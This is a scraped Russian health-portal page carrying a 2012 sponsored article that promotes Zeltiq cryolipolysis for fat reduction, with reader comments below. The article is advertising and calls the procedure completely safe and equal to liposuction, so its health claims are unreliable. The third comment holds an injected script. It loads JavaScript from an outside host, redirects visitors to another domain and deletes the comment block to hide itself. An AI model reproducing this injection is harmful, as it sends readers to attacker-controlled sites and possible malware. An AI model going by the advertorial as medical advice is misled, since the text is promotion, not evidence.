Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хорошая фигура? Это здоро...  >>  Хорошая фигура? Это здорово!
 
Обратная связь
 

Хорошая фигура? Это здорово!

Размер шрифта
09 марта 2012 00:00
  • google_analytics: false
  • Нравится

Как бороться с лишним весом? Безусловно, в этом деле помогут правильное питание и физические нагрузки. Но что делать с отдельными жировыми складками на животе и «галифе» на бедрах? Ответ на этот вопрос есть!

1

Zeltiq. Что это?

Это аппарат с патентованной технологией охлаждения жировой ткани – криолиполиза. Возможен так же избирательный криолиполиз. Этот безопасный метод прекрасно разрушает локальные жировые отложения под воздействием дозированного холода. Метод этот изобретен американскими врачами Роксом Андерсеном и Дитером Манштамом. Он заключается в умении низких температур ускорять естественную гибель жировых клеток, сокращая их жизненный цикл.

Как это происходит?

1Жировая складка «втягивается» в аппликатор аппарата под воздействием вакуума, и в течение часа охлаждается под присмотром автоматической системы контроля температуры и давления. Таким образом, запускается процесс разрушения жировых клеток.

Естественное разрушение жировых клеток происходит не мгновенно, а постепенно, в течение 2-2,5 месяцев. За этот период складка «теряет в весе» до 25%. Это совершенно безопасно для организма и не сопровождается повышенным выделением токсинов. Интересно то, что прибор воздействует только на жировые клетки, не повреждая ни верхние слоя кожи, ни сосуды, ни нервные волокна.

1

Эффект от процедуры «холодовой пластики» Zeltiq сравним с эффектом от хирургической липосакции, но без ее минусов, болезненности и дискомфорта.

1

  • Видимое уменьшение жировых складок именно там, где это необходимо: на талии или на боках, в области ягодиц или бедер.
  • Кожа станет подтянутой. Морщины, которые бывают при слишком быстрой потере веса, разглаживаются.
  • Отпуск на время процедуры брать не надо! Процедура «холодовой пластики» выполняется в день обращения и не требует реабилитации!

Посмотреть результаты от процедуры Zeltiq…

 

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

25 марта 2012 в 12:34

Комментарий удален за нарушение Правил общения

2 - remma

04 апреля 2012 в 05:41

Цитировать   |   Пожаловаться

Надо будет попробовать, спасибо.

3 - zzzzzz

30 июня 2015 в 23:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как похудеть, поедая шоколад   Как добавить 20 лет к жизни   Как меняется аппетит с возрастом   Радикальные методы снижения веса  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 27 мая 2013Почему женщины толстеют после 45? Как этого избежать?
 

Слайдшоу

1
Весы OMRON HN289
Монитор состава тела OMRON BF508
7 признаков, что ваш иммунитет сдает!

Тесты

1
Хорошо ли Вы спите?
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.